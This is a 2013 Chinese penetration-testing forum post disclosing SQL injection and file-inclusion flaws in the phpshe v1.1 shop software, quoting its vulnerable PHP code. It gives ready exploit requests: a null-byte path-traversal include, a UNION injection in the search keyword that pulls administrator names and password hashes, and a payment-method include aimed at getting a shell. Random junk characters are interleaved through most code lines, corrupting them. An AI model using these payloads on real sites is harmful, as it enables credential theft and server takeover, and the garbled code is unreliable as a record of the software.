找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 2857|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
" \. @: H: x( q" S6 n. K/* Phpshe v1.1 Vulnerability6 S0 R6 r8 W2 x% h: P
/* ========================* [+ F( ^: P, m, ?+ h% M
/* By: : Kn1f3
9 P( G0 O% F4 `) m& d/* E-Mail : 681796@qq.com: |- C7 x3 @. X" s' D- b6 @: E
/*******************************************************/" M  p+ G' i. }  j) Y) |% \9 Q! Q
0×00 整体大概参数传输
# t# x- ]/ `" U; M1 g; z! [+ x
; E/ \# U0 J9 P$ @! c$ b7 T/ m) [* A

5 p$ Q: g7 C, g& A//common.php
  ^7 E$ G& }5 k7 d/ W7 c& }if (get_magic_quotes_gpc()) {
' M0 G) F% y7 p8 r2 i+ H) e4 i% ?!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');6 E+ o: a/ M& D5 _2 A" z
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
% h: {* `. b7 U# ?+ k/ a}
. \1 _- _" O( p* V+ U" h5 x) Selse {  y% s2 u2 I1 a# X. ~: d. s- c
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
, K1 Y  u; ~" A+ D; v!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');4 M' S2 o1 R5 F# k9 V8 Y
}
3 V8 J0 @! Z' a6 B3 [session_start();
$ N+ W# r+ J) b- E9 r!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
- Z8 v% n3 Q8 n- c7 x& |!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
( k  M3 J0 q- ?! [6 W
; ]. a+ r" q1 o4 I0×01 包含漏洞; U" g0 \+ H% s. |) }& B

) `" i  ?8 U% ]2 V5 v" y3 D- \* J
- Q( S5 H7 V3 u; H//首页文件
# \  |  I% j! j<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
0 V9 `! v5 A) r' p% ]. qinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞; `1 \; h3 d6 c
pe_result();
; Z- [& d2 r& ?9 y?>
# Z3 U1 w; E( K& [//common 文件 第15行开始
; g6 b! u/ {$ u5 B8 P# Iurl路由配置
& E! o& w1 ]5 E# [; q  }$module = $mod = $act = 'index';% A9 M5 H9 `4 f, y) m1 R6 s3 f
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);* t; d0 E$ h6 G" X+ \! k
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);  S' P$ a( i1 _& x6 e
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
2 g% Z, o# K( L- ?4 S, o) D//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00& N0 z$ s+ k% V2 x


5 L3 S7 U8 z% P2 L 1 b; k7 d: D  [( c8 j* j0 I, e
0×02 搜索注入& ?5 D; r2 {, B, c6 a
3 R8 j: H+ Q. G; s! ^3 R
<code id="code2">

//product.php文件; [$ C1 D7 i+ X4 P  I# e) J
case 'list':: [7 |+ r8 c: D  w" s' ~
$category_id = intval($id);4 j( W/ G3 I1 v  C7 Y$ ?$ i7 S  f/ N
$info = $db->pe_select('category', array('category_id'=>$category_id));
% x: {0 {% o. R6 |) U& D* a( z9 B//搜索: M! C0 t4 Q' Z" q
$sqlwhere = " and `product_state` = 1";5 g6 f* J, j" E% X
pe_lead('hook/category.hook.php');
" ^6 w$ t4 _' _' t) vif ($category_id) {
. E: t( A( ]3 iwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";2 z; H! L% D& Y% @
}* t% h! U+ S& h" L! V
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
5 C2 l- P5 o1 Pif ($_g_orderby) {
+ }% g; G4 F( n+ [: t) o$orderby = explode('_', $_g_orderby);' }! T: s. e3 z! [; f% X" U- s/ n
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
3 {2 [6 I' d, U) o}3 a8 ^7 f1 ^' h* V) D
else {
( C+ R# \* E6 f. V: F( s7 j$sqlwhere .= " order by `product_id` desc";
: A5 o2 d- @/ |1 z}
) K( y6 p1 Z, \# a$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));- s; o  x  v$ ?9 k
//热卖排行
% a% ?; b4 h% z- l! Z$product_hotlist = product_hotlist();
% x! b& a6 ]- b% A2 e6 A//当前路径, O" `+ Y, ^- \/ \! X0 h
$nowpath = category_path($category_id);) T: d, w* A: F2 ~5 v0 B& z5 ?8 A
$seo = pe_seo($info['category_name']);
+ m1 E8 G1 ?. V0 Oinclude(pe_tpl('product_list.html'));
9 S' r3 C4 m. ?  h* U9 g) c//跟进selectall函数库
& D" t: F6 N) @* c& X4 e4 C. V* epublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())5 }% [+ E1 \0 I6 ?, }; G5 ^/ |
{" c1 {4 N* b1 k5 A
//处理条件语句* d& a& Y( z& }) d, H
$sqlwhere = $this->_dowhere($where);
8 _4 f% D: ~' X. @2 i7 areturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);0 @: `2 \$ L# h* V
}
" e! Z  \; S+ ^* _//exp% R8 {8 h1 ~) V, A5 \, a
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1# T/ A7 E' f1 _

</code>/ U3 o" F1 q" F, z* \

8 e1 g! y; ^/ t2 t* J0×03 包含漏洞2
* O) L" w! \# A4 j& U( d; E# Y % J. a7 J" i' f
<code id="code3">

//order.php

case 'pay':

) Y0 r& ^+ X, m' R: ?) }
$order_id = pe_dbhold($_g_id);


3 M( |( M. b8 [& b$cache_payway = cache::get('payway');

1 |7 x4 b, C/ V" y/ g8 j5 p7 _
foreach($cache_payway as $k => $v) {


. p0 J4 `- s3 e- f$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

2 F: m0 b5 i# F. \; o2 ], g2 @; U
if ($k == 'bank') {


' f+ U6 U. E  n' Z$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

. j' o4 R# t: ^, M& f
}


% t, z. l2 }, a7 Q& X0 ]}

5 a8 e+ D* u- _( U
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


. z- P5 e8 p5 Q- }; Q9 e2 k- i6 t!$order['order_id'] && pe_error('订单号错误...');

5 K; q$ T' Q" l
if (isset($_p_pesubmit)) {

  o$ E& L- t& E( z" ~
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$ J3 N/ E2 s( t8 |2 }- y
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


7 V9 A7 h9 ]2 f4 A/ {foreach ($info_list as $v) {


: x0 y3 `" [# }* a; i5 z  V/ e" A1 @7 @$order['order_name'] .= "{$v['product_name']};";
8 c  |* V/ Q; \  f' T5 u; \) ]# }

( \7 [& Q% `, L5 J( @: _4 X6 `
}


% S% Y  R( g+ i! G8 ~echo '正在为您连接支付网站,请稍后...';

4 |- Z' [  U, m# V; v/ l/ l  v
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

  l, {( [' R# e7 Q1 r
}//当一切准备好的时候就可以进行"鸡肋包含了"


: {; G& t5 R$ y2 M2 ?0 Pelse {

: B) A* X2 a8 A, q) y, y7 l
pe_error('支付错误...');


, C% }5 J  y" P! b. C}


8 U. @) u8 u4 N+ y% j. E0 K" I1 d}


; J# b* `+ K  e) C- Z6 z! E$seo = pe_seo('选择支付方式');

! P' p6 c$ p. E* v% Y7 T7 G
include(pe_tpl('order_pay.html'));

; d# |! j; F5 N9 |; K: O
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
) R" F& g. N' A7 Q! {http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表